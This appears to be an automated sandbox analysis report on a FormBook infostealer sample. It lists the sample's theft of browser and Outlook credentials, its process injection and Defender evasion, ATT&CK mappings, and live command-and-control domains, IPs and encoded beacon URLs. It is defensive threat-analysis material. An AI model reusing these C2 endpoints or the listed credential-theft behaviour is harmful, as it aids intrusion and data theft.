            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		312
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            System Network Configuration Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials1
            System Network Connections Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSync2
            File and Directory Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc Filesystem113
            System Information Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529867 Sample: NU1aAbSmCr.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 37 www.tophm.xyz 2->37 39 www.030002304.xyz 2->39 41 6 other IPs or domains 2->41 49 Malicious sample detected (through community Yara rule) 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected FormBook 2->53 57 6 other signatures 2->57 10 NU1aAbSmCr.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 39->55 process4 file5 35 C:\Users\user\AppData\...35U1aAbSmCr.exe.log, ASCII 10->35 dropped 69 Adds a directory exclusion to Windows Defender 10->69 14 NU1aAbSmCr.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 14->71 19 mCFHCvdrqdDiDT.exe 14->19 injected 73 Loading BitLocker PowerShell Module 17->73 22 conhost.exe 17->22         started        24 WmiPrvSE.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 19->59 26 NETSTAT.EXE 13 19->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 mCFHCvdrqdDiDT.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 www.tophm.xyz 199.192.21.169, 49993, 49994, 49995 NAMECHEAP-NETUS United States 29->43 45 030002304.xyz 65.21.196.90, 49981, 49982, 49983 CP-ASDE United States 29->45 47 3 other IPs or domains 29->47 75 Found direct / indirect Syscall (likely to bypass EDR) 29->75 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            NU1aAbSmCr.exe66%ReversingLabsWin32.Trojan.Leonem
            NU1aAbSmCr.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.tophm.xyz
            		199.192.21.169
            		truetrue
              		unknown
              newdaydawning.net
              		44.213.25.70
              		truefalse
                		unknown
                030002304.xyz
                		65.21.196.90
                		truetrue
                  		unknown
                  www.coffee-and-blends.info
                  		217.160.0.231
                  		truefalse
                    		unknown
                    kovallo.cloud
                    		81.2.196.19
                    		truefalse
                      		unknown
                      s-part-0032.t-0009.t-msedge.net
                      		13.107.246.60
                      		truefalse
                        		unknown
                        www.030002304.xyz
                        		unknown
                        		unknowntrue
                          		unknown
                          www.kovallo.cloud
                          		unknown
                          		unknowntrue
                            		unknown
                            www.newdaydawning.net
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.tophm.xyz/30rz/false
                                		unknown
                                http://www.tophm.xyz/30rz/?wZBh=UzoT8ph&8T2hn=wd7m4mq4h41P+rN28pyT+ttY7GHVuAvuqtpnERraqOjaWWvMpBvRQDu/0Ra1ptpTEf0KGGfWsjsqje2uOEmu4OBI5eYxRB5JEme+Ix16OOjxqM3SMw==false
                                  		unknown
                                  http://www.kovallo.cloud/koup/?wZBh=UzoT8ph&8T2hn=zjgQ1IglZSD3j4X7Mb/L9VMKC/lioNLyTiYpIFDypb2XxqZYhzfHyCasu3J1FKt+ikpO665Ej+Wn9KB3IEhbZRsyBSNLju/tAMuqMeNka3iE/L9xhA==false
                                    		unknown
                                    http://www.coffee-and-blends.info/fhdl/false
                                      		unknown
                                      http://www.newdaydawning.net/igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jeths6OaqB6aU1oO66EyRWu95qtLC+XaCQo95JR9SCocHD8In7sYhzsBDy4zub0g2aDA==false
                                        		unknown
                                        http://www.030002304.xyz/6uay/?8T2hn=4t2O3O+pZmQg6Me57d3wJo6heDIGdjpowWW3Ki6AModP/Z3yDnI8KOs9thhsa1jg844M9/RLYM/vwhOiRdypu3qnYIwYUCnWcXg0sNwBl87ACBA0Bg==&wZBh=UzoT8phfalse
                                          		unknown
                                          http://www.coffee-and-blends.info/fhdl/?8T2hn=LZaialQPeltHsffZ/7p0gpt1IPXssyuTEG6qh16Ey8GBHHnvE/VN849lTokelyHAfcJ0dO++uyhAerPT/GlJwSRZaBuTZ4zvU4RSMcEjcessmo3sdA==&wZBh=UzoT8phfalse
                                            		unknown
                                            http://www.030002304.xyz/6uay/false
                                              		unknown
                                              http://www.newdaydawning.net/igaf/false
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://ac.ecosia.org/autocomplete?q=NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://duckduckgo.com/chrome_newtabNETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://duckduckgo.com/ac/?q=NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.tophm.xyzmCFHCvdrqdDiDT.exe, 0000000E.00000002.2583578419.0000000004A1D000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  		unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchNETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.ecosia.org/newtab/NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNU1aAbSmCr.exe, 00000000.00000002.1350243310.0000000002A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://newdaydawning.net/igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jethNETSTAT.EXE, 0000000B.00000002.2583392591.00000000045F8000.00000004.10000000.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000002.2581565135.0000000002C88000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    217.160.0.231
                                                    		www.coffee-and-blends.infoGermany
                                                    		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                    65.21.196.90
                                                    		030002304.xyzUnited States
                                                    		199592CP-ASDEtrue
                                                    199.192.21.169
                                                    		www.tophm.xyzUnited States
                                                    		22612NAMECHEAP-NETUStrue
                                                    44.213.25.70
                                                    		newdaydawning.netUnited States
                                                    		14618AMAZON-AESUSfalse
                                                    81.2.196.19
                                                    		kovallo.cloudCzech Republic
                                                    		24806INTERNET-CZKtis238403KtisCZfalse

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1529867
                                                    Start date and time:2024-10-09 14:00:07 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 59s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:15
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:NU1aAbSmCr.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:ee229e0094d512a8a9e8210e75ca4319384360113b541aa7a10ed301e0425830.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@11/7@5/5
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 97%
                                                    • Number of executed functions: 105
                                                    • Number of non-executed functions: 306
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target mCFHCvdrqdDiDT.exe, PID 6888 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: NU1aAbSmCr.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    08:00:58API Interceptor1x Sleep call for process: NU1aAbSmCr.exe modified
                                                    08:01:00API Interceptor16x Sleep call for process: powershell.exe modified
                                                    08:02:22API Interceptor715685x Sleep call for process: NETSTAT.EXE modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    217.160.0.231PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                    • www.coffee-and-blends.info/bhth/
                                                    New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                    • www.coffee-and-blends.info/bhth/
                                                    65.21.196.908EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                    • www.030002304.xyz/f06i/
                                                    BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                    • www.030002837.xyz/y045/
                                                    BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                    • www.070001294.xyz/90jl/
                                                    5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                    • www.030002721.xyz/st0f/?-hF=sZ0LOH4&HPBxr6=OZJ3FWHE8eHsfWE6sR/jZh7GV9NsFGiNmpPQ4eftWQT1hyascoenGoAxdn6KH9WZ2QPSeMYxIK2pDBtCkY1R4v4J1R7l9kCKhVgR/LucEqSnpRqwhg==
                                                    RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                    • www.030003302.xyz/1nuz/?LT=aZbPzzPX3H&O47=39evZXa6m7baCAiDcr0ch6V4fD09WsXkaMbScS7vY88jTdTJUv9E9AetrBPXqBlycVnLEijqhZPiEuH/pw4OidZAp+cuSwNE5fzYgJgK5BTkLsTa3g==
                                                    Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                    • www.030002304.xyz/u38h/?EZ2lo=iaxEuHPh9M0PkCehiVmYq99vb8GYcF42nF8/pgvOtFqWiDn4lMrJ/WO5nlbDSyDBFBFfwqZzhOOdUgIoiT3LOtzwEygyB6NUSlIKo/1Br+QrM4rsiQ==&7NP=7FXXUPl
                                                    rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.030002626.xyz/49rz/
                                                    Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.030002803.xyz/l4gu/
                                                    P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                    • www.030002837.xyz/zl45/
                                                    LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                    • www.030002304.xyz/7b6l/
                                                    199.192.21.169lPX6PixV4t.exeGet hashmaliciousFormBookBrowse
                                                    • www.zenscape.top/d8cw/
                                                    Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                    • www.zenscape.top/d8cw/
                                                    8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                    • www.cenfresh.life/6iok/
                                                    PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                    • www.selftip.top/85su/
                                                    update SOA.exeGet hashmaliciousFormBookBrowse
                                                    • www.technectar.top/ghvt/
                                                    NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                    • www.selftip.top/85su/
                                                    RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                    • www.zenscape.top/d8cw/
                                                    Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                    • www.zenscape.top/d8cw/
                                                    DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                    • www.selftip.top/85su/
                                                    DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                    • www.urbanpulse.help/r50h/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    s-part-0032.t-0009.t-msedge.netDoc_0211.zipGet hashmaliciousUnknownBrowse
                                                    • 13.107.246.60
                                                    http://www.gofreight.com/Get hashmaliciousUnknownBrowse
                                                    • 13.107.246.60
                                                    T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                    • 13.107.246.60
                                                    https://securcomau.gurucan.com/66e8e67dd77b5900129b4800Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.246.60
                                                    https://urbanentertainmentfo.com.de/7AHXX/Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.246.60
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 13.107.246.60
                                                    https://link-karix.unifiedrml.com/link/load/?uid=66f149a6a2cee777918b45c2-66f14b565f7b47ad77e978c0-66f14b0aa2cee705a28b4575&uri=https%3A%2F%2Fbluworldusabluworldusa.jimdofree.com/Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.246.60
                                                    https://paa9eki.fitutend.com/p0wh/Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.246.60
                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 13.107.246.60
                                                    https://keepass.info/news/n240601_2.57.html#v1Get hashmaliciousUnknownBrowse
                                                    • 13.107.246.60
                                                    www.coffee-and-blends.infoPO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                    • 217.160.0.231
                                                    New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                    • 217.160.0.231
                                                    x.exeGet hashmaliciousFormBookBrowse
                                                    • 217.160.0.231
                                                    bin.exeGet hashmaliciousFormBookBrowse
                                                    • 217.160.0.231

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    ONEANDONE-ASBrauerstrasse48DEpQGOxS84rW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 213.165.67.119
                                                    http://gastrotrade24.org/Get hashmaliciousUnknownBrowse
                                                    • 217.160.0.174
                                                    BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                    • 74.208.236.183
                                                    N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                    • 74.208.236.25
                                                    http://lifecodigestion.comGet hashmaliciousUnknownBrowse
                                                    • 217.76.142.239
                                                    SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                    • 195.20.232.175
                                                    SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                    • 195.20.232.175
                                                    na.elfGet hashmaliciousUnknownBrowse
                                                    • 195.20.246.158
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 212.227.156.190
                                                    Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 213.165.67.118
                                                    CP-ASDE9vhyFG1hNa.exeGet hashmaliciousFormBookBrowse
                                                    • 65.21.196.90
                                                    8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                    • 65.21.196.90
                                                    BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                    • 65.21.196.90
                                                    https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFnDa0TAMLVO9WtBTyYEZqZA-3DPrnv_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOmYNN4Eos0I-2F5FhDJBI4w4qadztSYeu4ugOMJrD5ZJ3NK5HbR-2B5js4EjZpFmlZJIJ2eepX0b1t3SsV5gyIJGc7CJjeC8X5Wxzv49-2FqOYJzl5qBXpr-2BWwAW7G6cWDOqZN4YK73LjV4xBBNvL9fcHX0SM3SHQjbhXBuKD0dh5WqiuRgt8l7OsZEvxy8UkJaur7KIBjJyVTij7zCSJnYd6mjsUFQl8fAjX9eSOEGKjy2XWh8GHa2xi9VgTVCxGMcn7gM-3DGet hashmaliciousUnknownBrowse
                                                    • 65.21.29.43
                                                    BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                    • 65.21.196.90
                                                    5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                    • 65.21.196.90
                                                    RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                    • 65.21.196.90
                                                    http://dmed-industries.comGet hashmaliciousHtmlDropperBrowse
                                                    • 65.21.29.43
                                                    Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                    • 65.21.196.90
                                                    https://jumatan.sudaha.biz.id/4F741t%23XjCw%5BYg/Get hashmaliciousUnknownBrowse
                                                    • 65.21.235.194
